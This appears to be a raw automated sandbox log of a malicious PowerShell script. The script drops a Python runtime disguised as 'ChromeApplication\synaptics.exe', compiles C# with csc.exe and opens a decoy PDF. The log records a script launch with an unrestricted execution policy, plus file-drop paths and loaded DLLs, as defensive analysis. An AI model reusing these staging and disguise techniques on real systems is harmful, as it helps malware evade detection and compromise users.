Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Util\_strxor.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32lz.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_hashlib.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32event.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_sqlite3.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\mfc140u.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32service.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_multiprocessing.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\pyexpat.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\_winxptheme.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32security.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Util\_cpuid_c.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\servicemanager.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\Pythonwin.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Protocol\_scrypt.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\libssl-1_1.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32net.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\pythonservice.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\libffi-7.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32gui.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\PublicKey\_ec_ws.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32cred.pydJump to dropped file
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F4A60E0_2_00007FF848F4A60E
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeCode function: 7_2_6C4E0CA07_2_6C4E0CA0
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeCode function: 7_2_6C53AED07_2_6C53AED0
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeCode function: 7_2_6C483AD07_2_6C483AD0
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeCode function: 7_2_6C4834F07_2_6C4834F0
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeCode function: 7_2_6C4C86107_2_6C4C8610
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeCode function: 7_2_6C5527007_2_6C552700
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeCode function: 7_2_6C5907D07_2_6C5907D0
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeCode function: 7_2_6C56D1D07_2_6C56D1D0
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeCode function: 7_2_6C5522207_2_6C552220
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeCode function: 7_2_6C4F52807_2_6C4F5280
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeCode function: 7_2_6C4D83607_2_6C4D8360
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeCode function: 7_2_73A883A47_2_73A883A4
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeCode function: 7_2_73A831B07_2_73A831B0
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_asyncio.pyd E01FDB89380EBF58700F40DCEBAFCB37F24970C8EA1F33063BDEA873B53E720D
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_bz2.pyd B682E9E8152036BDEBF4CA5410D3C0F88FA3272A969830F63C7B61BB1F0DA89F
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeCode function: String function: 6C566B30 appears 142 times
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeCode function: String function: 6C58C540 appears 72 times
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeCode function: String function: 6C476DD0 appears 113 times
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeCode function: String function: 6C4EEA40 appears 40 times
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeCode function: String function: 6C548FE0 appears 52 times
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeCode function: String function: 6C4D2B20 appears 53 times
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeCode function: String function: 6C4A5FA0 appears 59 times
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeCode function: String function: 6C5985D0 appears 65 times
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeCode function: String function: 6C566B50 appears 199 times
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeCode function: String function: 6C5657C0 appears 148 times
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeCode function: String function: 6C565850 appears 34 times
Source: synaptics.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: _overlapped.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: pathlib.py.0.drBinary string: # such as '\??\C:' => '\Device\HarddiskVolume2'.
Source: classification engineClassification label: mal64.troj.expl.evad.winPS1@25/1111@6/4
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeCode function: 7_2_6C566570 PyErr_SetExcFromWindowsErrWithFilenameObjects,GetLastError,FormatMessageW,PyUnicode_FromFormat,PyUnicode_FromWideChar,LocalFree,_Py_NoneStruct,_Py_NoneStruct,Py_BuildValue,_PyObject_Call,_PyErr_SetObject,LocalFree,7_2_6C566570
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplicationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6180:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sxvweuob.vrf.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\protected.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\o3u40tef\o3u40tef.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES949A.tmp" "c:\Users\user\AppData\Local\Temp\o3u40tef\CSCF365B556FF7845F2AC7AB259D83AC6F.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Document.pdf"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe "C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe" C:\Users\user\AppData\Local\ChromeApplication\runtime.py
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1608,i,15562068496254741247,5473904975598172256,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: unknownProcess created: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe "C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe" C:\Users\user\AppData\Local\ChromeApplication\runtime.py
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\o3u40tef\o3u40tef.cmdline"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Document.pdf"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe "C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe" C:\Users\user\AppData\Local\ChromeApplication\runtime.py Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES949A.tmp" "c:\Users\user\AppData\Local\Temp\o3u40tef\CSCF365B556FF7845F2AC7AB259D83AC6F.TMP"Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1608,i,15562068496254741247,5473904975598172256,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeSection loaded: python310.dllJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
